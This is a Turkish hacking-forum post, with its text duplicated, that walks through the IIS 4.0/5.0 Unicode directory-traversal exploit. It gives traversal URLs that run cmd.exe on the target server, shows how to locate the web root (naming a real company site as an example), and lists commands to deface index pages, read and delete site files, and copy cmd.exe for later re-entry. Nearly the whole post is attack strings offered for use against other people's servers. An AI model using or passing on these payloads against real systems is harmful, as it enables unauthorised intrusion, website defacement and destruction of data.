Cr4ck3r
New member
- Katılım
- 9 Tem 2005
- Mesajlar
- 296
- Reaction score
- 0
- Puanları
- 0
Unicode Expolit
Unicode Expolit'i, IIS 4.0 ve IIS 5.0 sunucularda olan bir açıktır.NT ve Windows 2000 sunucuların korkulu rüyası haline gelen unicode expolitini DOS komutlarını bilen herkez uygulayabilir.Expolitin serverda olup olmadığını test etmek için aşağıdaki adresleri tek tek denemeniz lazım:
http://www.siteninadresi.com/scripts/..%c0%af../winnt/
system32/cmd.exe?/c+dir+c:\
--------------------------------------------------------------------------------
http://www.siteninadresi.com/cgi-bin/..\..\..\..\..\..\winnt\
system32\cmd.exe?/c+dir+c:\
--------------------------------------------------------------------------------
http://www.siteninadresi.com/scripts/%c1%9c/winnt/system32/
cmd.exe?/c+dir+c:\
--------------------------------------------------------------------------------
http://www.siteninadresi.com/scripts/..%c0%af../winnt/
system32/cmd.exe?/c+dir+c:\
--------------------------------------------------------------------------------
http://www.siteninadresi.com/msadc/..%c0%af../..%c0%af../
..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
--------------------------------------------------------------------------------
http://www.siteninadresi.com/_vti_bin/..%c0%af../winnt/
system32/cmd.exe?/c+dir+c:\
--------------------------------------------------------------------------------
http://www.siteninadresi.com/_vti_bin/..%c0%af../..%c0%af../
..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
Denerken bir tanesinde karşınıza C: dizinini liste şeklinde görebiliyorsak sistem elimizde demektir
Root dizini genelde C:\Inetpub\wwwroot\ dizinidir.Bazen daha değişikte olabilir.Örnek olarak www.algida.com.tr 'da root dizini C:\Inetpub\wwwroot\unilver\algida.com.tr 'dı.Biz yinede kesin olarak bulmak için aşşağıdakini browserimize pasteliyip açalım.
http://hedefsunucu/dsi.idq
Kesin olacak diye birşey yoktur.Bu komut çalışırsa aşşağıdaki gibi bir yazı gözükecektir.
The IDQ file C:\Inetpub\wwwroot\algidacom.tr\dsi.idq could not be found.
Yinede bulamadıysak systemi biraz karıştırarak bulabiliriz.
systeme girdiğinizi varsayıyorum ve uygulamanız gerekenleri yazıyorum.
hedef dizinde şu komutu kullanabilirsiniz.
http://hedefsunucu/scripts/..%c0%af../winnt/system32/cmd.exe?/
c+echo+Hacked+By+Lagereta+>+c:\Inetpub\wwwroot\index.htm
bu komut index.htm nin içini sıfırlayarak Hacked By Lagereta yazısını koyar.
İşi saglama almak icin
http://hedefsunucu/scripts/..%c0%af../winnt/system32/cmd.exe?/
c+echo+Hacked+By+Lagereta+>+c:\Inetpub\wwwroot\*.htm
Uzantısı Htm olan dosyaların hepsinin içini Sıfırlar ve Hacked By XXX koyar...
Dosyaları type komutu kullanarak içeriğini görüntüleyebiliriz.
http://hedefsunucu/_vti_bin/..%c0%af../winnt/system32/cmd.exe?/
c+type+c:\Inetpub\wwwroot\index.htm
Silmek için
http://hedefsunucu/_vti_bin/..%c0%af../winnt/system32/cmd.exe?/
c+del+c:\Inetpub\
wwwroot\index.htm veya /*.htm /*.asp /*.* komutlarını kullanabiliris...
Tek çözüm cmd.exe`yi silmek bu duruma önlem olarak cmd.exe`yi farklı bir dizine kopyalayabilirsiniz.
http://hedefsunucu/_vti_bin/..%c0%af../winnt/system32/cmd.exe?/
c+copy+c:\winnt\system32\cmd.exe+c:\autoexec.exe
sonra yeniden systeme girmek için
http://hedefsunucu/_vti_bin/..%c0%af../autoexec.exe?/c+dir+c:\
komutunu kullanın.
Gerisi Size kalmış
Unicode Expolit'i, IIS 4.0 ve IIS 5.0 sunucularda olan bir açıktır.NT ve Windows 2000 sunucuların korkulu rüyası haline gelen unicode expolitini DOS komutlarını bilen herkez uygulayabilir.Expolitin serverda olup olmadığını test etmek için aşağıdaki adresleri tek tek denemeniz lazım:
http://www.siteninadresi.com/scripts/..%c0%af../winnt/
system32/cmd.exe?/c+dir+c:\
--------------------------------------------------------------------------------
http://www.siteninadresi.com/cgi-bin/..\..\..\..\..\..\winnt\
system32\cmd.exe?/c+dir+c:\
--------------------------------------------------------------------------------
http://www.siteninadresi.com/scripts/%c1%9c/winnt/system32/
cmd.exe?/c+dir+c:\
--------------------------------------------------------------------------------
http://www.siteninadresi.com/scripts/..%c0%af../winnt/
system32/cmd.exe?/c+dir+c:\
--------------------------------------------------------------------------------
http://www.siteninadresi.com/msadc/..%c0%af../..%c0%af../
..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
--------------------------------------------------------------------------------
http://www.siteninadresi.com/_vti_bin/..%c0%af../winnt/
system32/cmd.exe?/c+dir+c:\
--------------------------------------------------------------------------------
http://www.siteninadresi.com/_vti_bin/..%c0%af../..%c0%af../
..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
Denerken bir tanesinde karşınıza C: dizinini liste şeklinde görebiliyorsak sistem elimizde demektir
Root dizini genelde C:\Inetpub\wwwroot\ dizinidir.Bazen daha değişikte olabilir.Örnek olarak www.algida.com.tr 'da root dizini C:\Inetpub\wwwroot\unilver\algida.com.tr 'dı.Biz yinede kesin olarak bulmak için aşşağıdakini browserimize pasteliyip açalım.
http://hedefsunucu/dsi.idq
Kesin olacak diye birşey yoktur.Bu komut çalışırsa aşşağıdaki gibi bir yazı gözükecektir.
The IDQ file C:\Inetpub\wwwroot\algidacom.tr\dsi.idq could not be found.
Yinede bulamadıysak systemi biraz karıştırarak bulabiliriz.
systeme girdiğinizi varsayıyorum ve uygulamanız gerekenleri yazıyorum.
hedef dizinde şu komutu kullanabilirsiniz.
http://hedefsunucu/scripts/..%c0%af../winnt/system32/cmd.exe?/
c+echo+Hacked+By+Lagereta+>+c:\Inetpub\wwwroot\index.htm
bu komut index.htm nin içini sıfırlayarak Hacked By Lagereta yazısını koyar.
İşi saglama almak icin
http://hedefsunucu/scripts/..%c0%af../winnt/system32/cmd.exe?/
c+echo+Hacked+By+Lagereta+>+c:\Inetpub\wwwroot\*.htm
Uzantısı Htm olan dosyaların hepsinin içini Sıfırlar ve Hacked By XXX koyar...
Dosyaları type komutu kullanarak içeriğini görüntüleyebiliriz.
http://hedefsunucu/_vti_bin/..%c0%af../winnt/system32/cmd.exe?/
c+type+c:\Inetpub\wwwroot\index.htm
Silmek için
http://hedefsunucu/_vti_bin/..%c0%af../winnt/system32/cmd.exe?/
c+del+c:\Inetpub\
wwwroot\index.htm veya /*.htm /*.asp /*.* komutlarını kullanabiliris...
Tek çözüm cmd.exe`yi silmek bu duruma önlem olarak cmd.exe`yi farklı bir dizine kopyalayabilirsiniz.
http://hedefsunucu/_vti_bin/..%c0%af../winnt/system32/cmd.exe?/
c+copy+c:\winnt\system32\cmd.exe+c:\autoexec.exe
sonra yeniden systeme girmek için
http://hedefsunucu/_vti_bin/..%c0%af../autoexec.exe?/c+dir+c:\
komutunu kullanın.
Gerisi Size kalmış